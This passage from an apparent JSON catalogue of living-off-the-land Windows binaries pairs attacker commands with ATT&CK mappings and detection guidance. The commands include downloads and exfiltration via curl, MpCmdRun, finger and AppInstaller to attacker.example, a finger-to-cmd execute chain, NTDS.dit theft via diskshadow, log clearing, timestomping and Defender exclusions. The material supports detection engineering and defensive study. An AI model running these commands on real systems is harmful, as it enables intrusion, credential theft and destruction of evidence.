transfer) and -T/--upload-file (or -d/--data for POST) exfiltrates a local file to a remote server, all from a Microsoft-signed binary.","usecase":"Download a payload or stage/exfiltrate data using a built-in, trusted HTTP client instead of certutil/bitsadmin.","mitre":["T1105","T1567"],"privilege":"user","detection":[{"type":"Detection","value":"curl.exe writing executable/script content with -o/-O; curl.exe -T/--upload-file or -d to external hosts; curl.exe with a non-interactive parent (office, script host); egress to newly-seen domains from curl.exe."}],"references":["https://curl.se/docs/manpage.html","https://curl.se/windows/"],"added":true,"verifyNote":"curl.se manpage documents -o/--output and -T/--upload-file (and -d/--data) exactly as described; curl.se/windows confirms the Microsoft-signed in-box build."},{"id":"daemon:tar:17","toolId":"daemon:tar","toolName":"tar.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download","Hide/ADS"],"command":"tar.exe -xf \\\\10.10.10.10\\share\\x.tar -C C:\\Windows\\Temp\ntar.exe -cf C:\\Windows\\Temp\\x.txt:evil.tar C:\\Windows\\Temp\\payload","description":"The in-box bsdtar (Windows 10 1803+) extracts an archive directly from a UNC/SMB path, pulling files from a remote host without a classic downloader (ingress transfer). tar can also read from and write to NTFS Alternate Data Streams (path:ads), hiding archived payloads inside a benign-looking file.","usecase":"Copy files in from a remote share, or stash a payload in an ADS to evade file-based detection, using a signed archiver.","mitre":["T1105","T1564.004"],"privilege":"user","detection":[{"type":"Detection","value":"tar.exe with a UNC (\\\\host\\share) source; tar.exe archive paths containing ':' (ADS notation); tar.exe making SMB/network connections; extraction into system-writable temp dirs."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml","https://learn.microsoft.com/en-us/windows/tar/"],"added":true,"verifyNote":"LOLBAS Tar.yml documents `tar -xf {PATH_SMB:.tar}` (T1105) and `tar -cf {PATH}:ads {folder}` / `tar -xf {PATH}:ads` (T1564.004); both match."},{"id":"daemon:ssh:18","toolId":"daemon:ssh","toolName":"ssh.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["Execution","Library Load"],"nativeCategory":["Execute"],"command":"ssh.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" .\nssh.exe -o PKCS11Provider=\"\\\\10.10.10.10\\Temp\\x.dll\" user@test.local","description":"The in-box OpenSSH client (Windows 10 1809+) runs the string given in ProxyCommand/LocalCommand through the shell before it ever connects, giving indirect command execution under a signed binary. The PKCS11Provider option loads and executes an attacker DLL (DllMain / C_GetFunctionList) from a remote SMB share.","usecase":"Proxy-execute a command or side-load a DLL from a signed, trusted SSH client for defense evasion.","mitre":["T1202","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"ssh.exe with ProxyCommand/LocalCommand/PKCS11Provider on the command line; ssh.exe spawning cmd.exe/powershell.exe; ssh.exe loading a non-standard DLL from a UNC path; ssh.exe run with no legitimate remote host."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Ssh.yml quotes `ssh -o ProxyCommand=\"{CMD}\" .` and `ssh -o PKCS11Provider=\"\\\\...\\example.dll\"` (DLL from SMB share), MitreID T1202; match. NOTE: secondary T1218 tag flagged in suspect — the PKCS11 DLL load maps better to T1574.002/T1129."},{"id":"daemon:scp:19","toolId":"daemon:scp","toolName":"scp.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["Execution","File Copy"],"nativeCategory":["Execute"],"command":"scp.exe -S C:\\Windows\\Temp\\x.exe . localhost:.\nscp.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" . localhost:.","description":"The in-box OpenSSH scp client spawns the program named by -S (alternate ssh program) or ProxyCommand even when no SSH server is listening, giving indirect command execution under a signed binary. scp also legitimately copies files to/from remote hosts and can be used to stage or exfiltrate data.","usecase":"Proxy-execute a command through scp->ssh, or move files off-host, using a signed binary.","mitre":["T1202","T1105"],"privilege":"user","detection":[{"type":"Detection","value":"scp.exe with -S or -o ProxyCommand; scp.exe child processes (cmd/powershell); scp.exe copying to/from external hosts; scp targeting localhost with no SSH service present."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Scp.yml quotes both `scp.exe -S \"{CMD}\" . localhost:.` and `scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.` (spawns even with no SSH), MitreID T1202; match."},{"id":"daemon:msedge:20","toolId":"daemon:msedge","toolName":"msedge.exe","name":"Download","source":"DAEMON","platform":["Windows","macOS","Linux"],"capability":["File Download","Execution"],"nativeCategory":["Download","Execute"],"command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"https://attacker.example/x.base64.html\" > C:\\Windows\\Temp\\x.b64\nmsedge.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"","description":"Chromium browsers (Edge is preinstalled and signed; chrome.exe behaves identically) print the rendered DOM to stdout with --headless --dump-dom, letting an operator pull a base64 payload disguised as an .html page with no classic downloader on the command line. The --gpu-launcher switch runs an arbitrary command as a child of the signed browser (system binary proxy execution).","usecase":"Silently download a payload via a trusted browser, or proxy-execute a command under a signed browser process.","mitre":["T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"browser process (msedge.exe/chrome.exe) with --headless together with --dump-dom, or with --gpu-launcher/--utility-cmd-prefix/--renderer-cmd-prefix; browser redirecting stdout to a file; browser process whose parent is a script host or Office app."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml","https://twitter.com/mrd0x/status/1478234484881436672"],"added":true,"verifyNote":"LOLBAS Msedge.yml (OSBinaries) documents `--headless --enable-logging --disable-gpu --dump-dom` (T1105) and `--disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` (T1218.015); reference URL corrected to the OSBinaries YAML path."},{"id":"daemon:mpcmdrun:21","toolId":"daemon:mpcmdrun","toolName":"MpCmdRun.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download","ADS"],"command":"MpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe\nMpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe:evil.exe","description":"Microsoft Defender's command-line utility (MpCmdRun.exe) downloads an arbitrary URL to disk with -DownloadFile (slashes or dashes both work), and can drop the file straight into an NTFS Alternate Data Stream. It is a signed AV binary, so the transfer blends in. Microsoft removed the flag in newer builds, but older platform copies remain abusable.","usecase":"Download a payload (optionally hidden in an ADS) using the trusted Defender binary itself.","mitre":["T1105","T1564.004"],"privilege":"user","detection":[{"type":"Detection","value":"MpCmdRun.exe with -DownloadFile/-url/-path; MpCmdRun.exe launched from a non-Defender directory or by an unexpected parent; network egress from MpCmdRun.exe to non-Microsoft hosts; -path containing ':' (ADS)."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml","https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"],"added":true,"verifyNote":"LOLBAS MpCmdRun.yml quotes `-DownloadFile -url {REMOTEURL:.exe} -path {PATH:.exe}` (T1105, slashes/dashes both work) and the `-path {PATH}:evil.exe` ADS variant (T1564.004); match."},{"id":"daemon:desktopimgdownldr:22","toolId":"daemon:desktopimgdownldr","toolName":"desktopimgdownldr.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download"],"command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://attacker.example/x.exe /eventName:desktopimgdownldr","description":"The Personalization CSP lock-screen tool downloads the URL given in /lockscreenurl to disk as a standard user. Overriding the SYSTEMROOT environment variable redirects the output to an attacker-chosen folder, and the PersonalizationCSP registry value seeded by the run can be deleted afterward to erase the trace.","usecase":"Download an arbitrary file with a native, signed Windows tool that is not certutil/bitsadmin.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"desktopimgdownldr.exe with /lockscreenurl to a non-Microsoft host or fetching a non-image; SYSTEMROOT environment override before the run; writes/deletes at HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml","https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/"],"added":true,"verifyNote":"LOLBAS Desktopimgdownldr.yml quotes `set \"SYSTEMROOT=...\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL}` (T1105); SentinelOne write-up is the original research source."},{"id":"daemon:appinstaller:23","toolId":"daemon:appinstaller","toolName":"AppInstaller.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"start ms-appinstaller://?source=https://attacker.example/x.msix","description":"The ms-appinstaller:// URI is handled by the signed App Installer (AppInstaller.exe), which reaches out to the source URL, attempts to load/install the package, and caches the fetched file in INetCache. The download rides a trusted protocol handler with no obvious downloader on the command line; the same handler underpinned real-world MotW-bypass delivery campaigns.","usecase":"Download a remote file/package through a trusted URI handler rather than an explicit HTTP client.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"AppInstaller.exe making outbound connections to non-Microsoft hosts; ms-appinstaller:// URI invocations (e.g. via explorer/start); files appearing in INetCache attributed to AppInstaller.exe; MSIX/APPX pulled from untrusted domains."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS AppInstaller.yml quotes `start ms-appinstaller://?source={REMOTEURL:.exe}` and notes the file is 'saved in INetCache' (T1105); match. ms-appinstaller MotW-bypass abuse is publicly documented (Microsoft disabled the handler in 2023)."},{"id":"daemon:onedrivestandaloneupdater:24","toolId":"daemon:onedrivestandaloneupdater","toolName":"OneDriveStandaloneUpdater.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download"],"command":"reg add \"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\" /v UpdateRingSettingURLFromOC /t REG_SZ /d https://attacker.example/x /f && OneDriveStandaloneUpdater.exe","description":"The signed OneDrive updater downloads from the URL stored in the user-writable registry value HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC. Setting that value and launching the updater fetches an attacker-controlled file while the process command line stays completely benign.","usecase":"Download a file from the internet with a signed updater and no anomalous command-line arguments.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"writes to HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC; OneDriveStandaloneUpdater.exe connecting to hosts outside the official OneDrive/Office update CDNs."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS OneDriveStandaloneUpdater.yml documents downloading from the URL in HKCU\\...\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC (T1105); match (LOLBAS also notes ODSUUpdateXMLUrlFromOC/UpdateXMLUrlFromOC must be non-empty)."},{"id":"daemon:finger:25","toolId":"daemon:finger","toolName":"finger.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Execution"],"nativeCategory":["Download"],"command":"finger user@attacker.example | more +2 | cmd","description":"The built-in Finger client retrieves data from a remote Finger (TCP/79) server; piping the server's response through more and into cmd turns the response into executed commands, giving a combined download-and-execute (and C2) channel over an unusual port with a signed binary.","usecase":"Retrieve and run attacker-supplied commands/payload over the rarely-monitored finger protocol.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"finger.exe making outbound TCP/79 connections to external hosts; finger.exe piped into cmd.exe/powershell.exe/more; any use of finger.exe at all, which is rare in modern environments."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS Finger.yml quotes `finger user@example.host.com | more +2 | cmd` verbatim (T1105, Download); exact match."},{"id":"daemon:wsl:26","toolId":"daemon:wsl","toolName":"wsl.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux"],"capability":["Execution","File Download"],"nativeCategory":["Execute","Download"],"command":"wsl.exe --exec bash -c \"id > /mnt/c/Windows/Temp/x\"\nwsl.exe --exec bash -c 'cat < /dev/tcp/10.10.10.10/54 > /tmp/x'","description":"wsl.exe (signed, present where WSL is installed) runs arbitrary Linux commands via --exec/-e (as root with -u root, no password), giving indirect command execution under a trusted binary. bash's /dev/tcp pulls files with no external tool. wsl.exe also resolves its install path from HKLM\\...\\Lxss\\MSI\\InstallLocation, so a planted wsl.exe there is executed instead of the legitimate one.","usecase":"Execute payloads on the Linux side (evading Windows EDR), transfer files via /dev/tcp, or masquerade a payload as WSL.","mitre":["T1202","T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"wsl.exe with -e/--exec/-u root; wsl.exe/bash.exe spawning children outside System32; changes to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation; /dev/tcp usage inside WSL bash."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Wsl.yml documents `wsl.exe --exec bash -c \"{CMD}\"` (T1202), `wsl.exe --exec bash -c 'cat < /dev/tcp/.../.. > binary'` (T1105), and the HKLM\\...\\Lxss\\MSI\\InstallLocation lookup; match."},{"id":"daemon:winget:27","toolId":"daemon:winget","toolName":"winget.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","AWL / Policy Bypass"],"nativeCategory":["Execute","AWL Bypass"],"command":"winget.exe install --manifest C:\\Windows\\Temp\\x.yml\nwinget.exe install --accept-package-agreements -s msstore {StoreID}","description":"The Windows Package Manager installs from a local manifest (--manifest) whose Installer URL points at an arbitrary file that is then downloaded and executed, or installs a Microsoft Store package by ID even when the Store app is blocked and AppLocker is active. Either path fetches and runs code through a signed installer, bypassing application-control policy.","usecase":"Download-and-execute an arbitrary installer, or pull software from the Store, past AppLocker/Store restrictions.","mitre":["T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"winget.exe install --manifest referencing a local/temp .yml; winget pulling installers from non-standard hosts; msstore installs where the Store app is policy-blocked; winget-spawned installer processes writing to unusual locations."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml","https://learn.microsoft.com/en-us/windows/package-manager/winget/install"],"added":true,"verifyNote":"LOLBAS Winget.yml quotes `winget.exe install --manifest {PATH:.yml}` (download+execute, T1105) and `winget.exe install --accept-package-agreements -s msstore {name/ID}` (AWL Bypass, installs even if Store app blocked); match."},{"id":"daemon:devtunnel:28","toolId":"daemon:devtunnel","toolName":"devtunnel.exe","name":"Download","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["File Upload","File Download"],"nativeCategory":["Download","Upload","Exfiltration"],"command":"devtunnel.exe host -p 8080","description":"The Microsoft Dev Tunnels agent (signed) exposes a local port/service on a Microsoft-hosted public *.devtunnels.ms URL. This creates an ingress/egress channel that can be used to reach internal services, stage tooling, or exfiltrate data, with the traffic riding trusted Microsoft tunneling infrastructure.","usecase":"Establish a trusted-domain tunnel for data transfer, exfiltration, or exposing an internal service to the internet.","mitre":["T1105","T1572","T1567"],"privilege":"user","detection":[{"type":"Detection","value":"devtunnel.exe execution and persistent connections to *.devtunnels.ms / global.rel.tunnels.api.visualstudio.com; internal services becoming reachable via a Microsoft tunnel domain; unexpected long-lived outbound sessions from devtunnel.exe."}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands"],"added":true,"verifyNote":"Microsoft Learn CLI reference documents `devtunnel host -p 3000` exposing a local port at a public *.devtunnels.ms URL; LOLBAS entry exists at OtherMSBinaries/devtunnels/ (reference URL corrected from the 404ing raw-YAML path to the working LOLBAS site page + MS Learn)."},{"id":"daemon:teams:29","toolId":"daemon:teams","toolName":"Teams.exe","name":"Execute","source":"DAEMON","platform":["Windows","macOS","Linux"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execute"],"command":"Teams.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"","description":"Classic Microsoft Teams is an Electron/Chromium app, and the Chromium --gpu-launcher switch runs an arbitrary command as a child of the signed Teams binary (system binary proxy execution / parent masquerading). The same abuse applies to other Electron apps, and Teams can also be made to run planted JavaScript from its app.asar/package.json.","usecase":"Proxy-execute a command under a trusted, signed Electron binary to blend with normal process trees.","mitre":["T1218.015"],"privilege":"user","detection":[{"type":"Detection","value":"Teams.exe (or any Electron app) launched with --gpu-launcher/--disable-gpu-sandbox/--utility-cmd-prefix; Teams.exe spawning cmd.exe/powershell.exe; unexpected writes to app.asar or package.json under %LOCALAPPDATA%\\Microsoft\\Teams."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml","https://attack.mitre.org/techniques/T1218/015/"],"added":true,"verifyNote":"LOLBAS Teams.yml quotes `teams.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` and the app.asar/package.json JavaScript variants, all MitreID T1218.015 (Electron Applications); match."},{"id":"daemon:diskshadow:30","toolId":"daemon:diskshadow","toolName":"diskshadow.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","Credential Access"],"nativeCategory":["Execute","Dump"],"command":"diskshadow.exe /s C:\\Windows\\Temp\\x.txt","description":"diskshadow's script mode (/s) runs each line of a text script; an exec line spawns a child process under a signed binary (indirect execution), while its VSS commands (set/create/expose) snapshot a volume so locked files like NTDS.dit or the SAM/SYSTEM hives can be copied out of the shadow copy. One signed tool covers both proxy execution and credential-store theft.","usecase":"Proxy-execute a command and/or snapshot the volume to copy NTDS.dit and registry hives for offline credential extraction.","mitre":["T1202","T1003.003"],"privilege":"admin","detection":[{"type":"Detection","value":"diskshadow.exe /s with a script file; diskshadow creating/exposing shadow copies; child processes spawned by diskshadow.exe; reads of NTDS.dit or SAM/SYSTEM via a shadow-copy path shortly after a snapshot."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml","https://attack.mitre.org/techniques/T1003/003/"],"added":true,"verifyNote":"LOLBAS Diskshadow.yml documents `diskshadow.exe /s {PATH:.txt}` (T1003.003, NTDS exfil via VSS) and `exec {PATH:.exe}` child-process spawn (T1202); FIX: removed T1006 — not in the LOLBAS mapping and diskshadow's VSS snapshot is squarely T1003.003, so only T1202+T1003.003 are retained."},{"id":"daemon:wevtutil:31","toolId":"daemon:wevtutil","toolName":"wevtutil.exe","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"wevtutil cl Security","description":"The built-in event log utility clears (empties) a named Windows Event Log channel with the cl / clear-log verb, destroying recorded evidence. An optional /bu: switch backs the log up first; adversaries omit it.","usecase":"Erase Security/System/Application logs after intrusion activity to remove indicators of compromise.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Security Event ID 1102 (audit log cleared) and System 104 (log file cleared). Log process creation (Sysmon 1 / Security 4688) for wevtutil.exe with 'cl' or 'clear-log' arguments; forward events to a SIEM so cleared local copies still survive centrally."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"added":true,"verifyNote":"MS Learn wevtutil doc confirms 'cl|clear-log <Logname> [/bu:<Backup>]' clears a log (docs example: wevtutil cl Application /bu:...); maps to ATT&CK T1070.001. No change."},{"id":"daemon:wevtutil:32","toolId":"daemon:wevtutil","toolName":"wevtutil.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable Windows Event Logging"],"command":"wevtutil sl Security /e:false","description":"The set-log (sl) verb with /e:false disables a Windows Event Log channel so future events for that channel are no longer written, blinding defenders without clearing existing entries.","usecase":"Disable Security or PowerShell operational channels before running noisy tooling so nothing is recorded.","mitre":["T1562.002","T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor process creation (Sysmon 1 / 4688) for wevtutil.exe with 'sl' plus '/e:false'. Watch Event ID 1100/1102/4719 (audit policy or log service state change) and alert on any channel being disabled, especially Security, System, and Microsoft-Windows-PowerShell/Operational."}],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"added":true,"verifyNote":"MS Learn wevtutil doc confirms 'sl|set-log' with '/e:<Enabled>' where Enabled is true or false ('Enables or disables a log'); primary ATT&CK ID T1562.002 is accurate (T1070.001 is a related secondary tag). No change."},{"id":"daemon:powershell:33","toolId":"daemon:powershell","toolName":"Clear-EventLog","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"Clear-EventLog -LogName Security","description":"The Windows PowerShell 5.1 Clear-EventLog cmdlet deletes all entries from a specified classic event log on a local or remote computer, an alternative to wevtutil for the same log-clearing effect.","usecase":"Clear event logs from within an existing PowerShell session without spawning wevtutil.exe.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Event ID 1102/104 as with any clear. Enable PowerShell Script Block Logging (4104) and Module Logging to capture the Clear-EventLog invocation; correlate with Sysmon 1 for powershell.exe. Sysmon's own channel typically survives a Security-log clear and preserves the trail."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog"],"added":true,"verifyNote":"MS Learn confirms Clear-EventLog 'deletes all of the entries from the specified event logs on the local computer or on remote computers' (classic-log cmdlet, requires Administrators); ATT&CK T1070.001. No change."},{"id":"daemon:powershell:34","toolId":"daemon:powershell","toolName":"Remove-EventLog","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"Remove-EventLog -LogName Security","description":"The Windows PowerShell 5.1 Remove-EventLog cmdlet deletes a classic event log entirely and unregisters its event sources, which can suppress future logging for that log until it is recreated (often after reboot).","usecase":"Delete and deregister a log so the intrusion leaves less evidence and future events are not captured.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Capture the cmdlet via Script Block Logging (4104) and Sysmon 1 for powershell.exe. Baseline the expected set of registered event logs and alert when a standard log (Security, System, Application) is missing or its sources are deregistered."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/remove-eventlog?view=powershell-5.1"],"added":true,"verifyNote":"MS Learn (PS 5.1) confirms Remove-EventLog 'deletes an event log file ... and unregisters all its event sources'; classic EventLog cmdlet (5.1 only, not PS7). No change."},{"id":"daemon:auditpol:35","toolId":"daemon:auditpol","toolName":"auditpol.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable Windows Event Logging"],"command":"auditpol /set /category:\"System\" /success:disable /failure:disable","description":"The built-in audit policy tool sets a subcategory or category to stop generating success/failure audit events; auditpol /clear /y wipes the entire advanced audit policy. Either action suppresses the events defenders rely on.","usecase":"Turn off auditing for noisy categories (e.g. process creation, logon) before operating, so key telemetry is never written.","mitre":["T1562.002"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Event ID 4719 (System audit policy was changed) and 4907. Log process creation for auditpol.exe with '/set ... /success:disable', '/failure:disable', '/clear', or '/remove'. Periodically compare live 'auditpol /get /category:*' output against a known-good baseline."}],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"],"added":true,"verifyNote":"MS Learn auditpol-set confirms '/set ... /category:<name> /success:<enable|disable> /failure:<enable|disable>' and auditpol '/clear'/'/remove' sub-commands; ATT&CK T1562.002. No change."},{"id":"daemon:fsutil:36","toolId":"daemon:fsutil","toolName":"fsutil.exe","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Delete Volume USN Journal"],"command":"fsutil usn deletejournal /d C:","description":"The fsutil usn deletejournal subcommand with /d disables the NTFS Update Sequence Number (USN) change journal on a volume and deletes its records, destroying a key forensic timeline of file creation, deletion, and modification.","usecase":"Wipe the NTFS change journal to hamper forensic reconstruction of file-level activity on a compromised host.","mitre":["T1070"],"privilege":"admin","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for fsutil.exe with 'usn' and 'deletejournal'. During forensics, a reset USN journal ID or an abrupt discontinuity/gap in journal records indicates deletion; ship file-audit and journal data off-host in near real time."}],"references":["https://attack.mitre.org/techniques/T1070/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn"],"added":true,"verifyNote":"MS Learn fsutil-usn confirms 'fsutil usn deletejournal {/d|/n} <volumepath>' with '/d' disabling the active USN change journal (docs example: fsutil usn deletejournal /d c:); ATT&CK T1070. No change."},{"id":"daemon:attrib:37","toolId":"daemon:attrib","toolName":"attrib.exe","name":"Hide Artifacts","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Hide Artifacts","Hidden Files and Directories"],"command":"attrib +h +s C:\\Windows\\Temp\\x\\payload.exe","description":"The built-in attrib command sets the Hidden (+h) and System (+s) file attributes so a file is concealed from default Explorer and 'dir' views, a simple way to hide dropped artifacts on disk.","usecase":"Conceal a dropped executable or staging file from casual inspection of a directory.","mitre":["T1564.001"],"privilege":"user","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for attrib.exe with '+h' and especially '+s' on files in user-writable paths (Temp, ProgramData, AppData). Hunt the file system for files carrying both Hidden and System attributes in atypical locations."}],"references":["https://attack.mitre.org/techniques/T1564/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib"],"added":true,"verifyNote":"MS Learn attrib doc confirms '{+|-}h' sets the Hidden and '{+|-}s' sets the System file attribute; ATT&CK T1564.001. No change."},{"id":"daemon:powershell:38","toolId":"daemon:powershell","toolName":"PowerShell","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Timestomp"],"command":"$(Get-Item C:\\Windows\\Temp\\x\\payload.exe).LastWriteTime = '01/01/2016 00:00:00'; [IO.File]::SetCreationTime('C:\\Windows\\Temp\\x\\payload.exe','01/01/2016')","description":"PowerShell can rewrite a file's $STANDARD_INFORMATION timestamps via the .CreationTime/.LastWriteTime/.LastAccessTime properties of a FileInfo object or the [System.IO.File]::SetCreationTime/SetLastWriteTime .NET methods, blending a malicious file in with legitimate neighbors (timestomping).","usecase":"Backdate or match a dropped file's MACE timestamps to defeat timeline analysis and 'recently modified' triage.","mitre":["T1070.006"],"privilege":"user","detection":[{"type":"Detection","value":"Sysmon Event ID 2 (FileCreateTime changed) flags user-mode $SI edits. Capture Script Block Logging (4104) for '.CreationTime =', '.LastWriteTime =', '[IO.File]::SetCreationTime', etc. In MFT forensics, a $STANDARD_INFORMATION timestamp earlier than the matching $FILE_NAME timestamp is a classic timestomp signature."}],"references":["https://attack.mitre.org/techniques/T1070/006/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"],"added":true,"verifyNote":"MS Learn .NET docs confirm System.IO.File.SetCreationTime/SetLastWriteTime and the FileInfo LastWriteTime/CreationTime settable properties; Atomic Red Team T1070.006 documents PowerShell timestomp; ATT&CK T1070.006. No change."},{"id":"daemon:powershell:39","toolId":"daemon:powershell","toolName":"Add-MpPreference","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify Tools"],"command":"Add-MpPreference -ExclusionPath 'C:\\Windows\\Temp\\x'\nAdd-MpPreference -ExclusionProcess 'C:\\Windows\\Temp\\x\\payload.exe'\nAdd-MpPreference -ExclusionExtension 'exe'","description":"The Defender module's Add-MpPreference cmdlet adds entries to the Microsoft Defender Antivirus exclusion list so matching items are no longer scanned in real time or on schedule: -ExclusionPath excludes a folder/file, -ExclusionProcess excludes any files opened by a named process, and -ExclusionExtension excludes an entire file type. Any of the three carves a blind spot for staging and executing tooling.","usecase":"Carve a Defender blind spot by excluding a staging path, an attacker process, or a whole extension before dropping tooling.","mitre":["T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor Defender Operational Event ID 5007 (configuration changed) and registry writes under HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\{Paths|Processes|Extensions} (Sysmon 13). Capture Add-MpPreference via Script Block Logging (4104) and alert on any new exclusion, especially paths/processes in Temp/AppData/ProgramData and extension-wide exclusions (rarely legitimate on endpoints). Enable Tamper Protection and centrally alert on exclusion 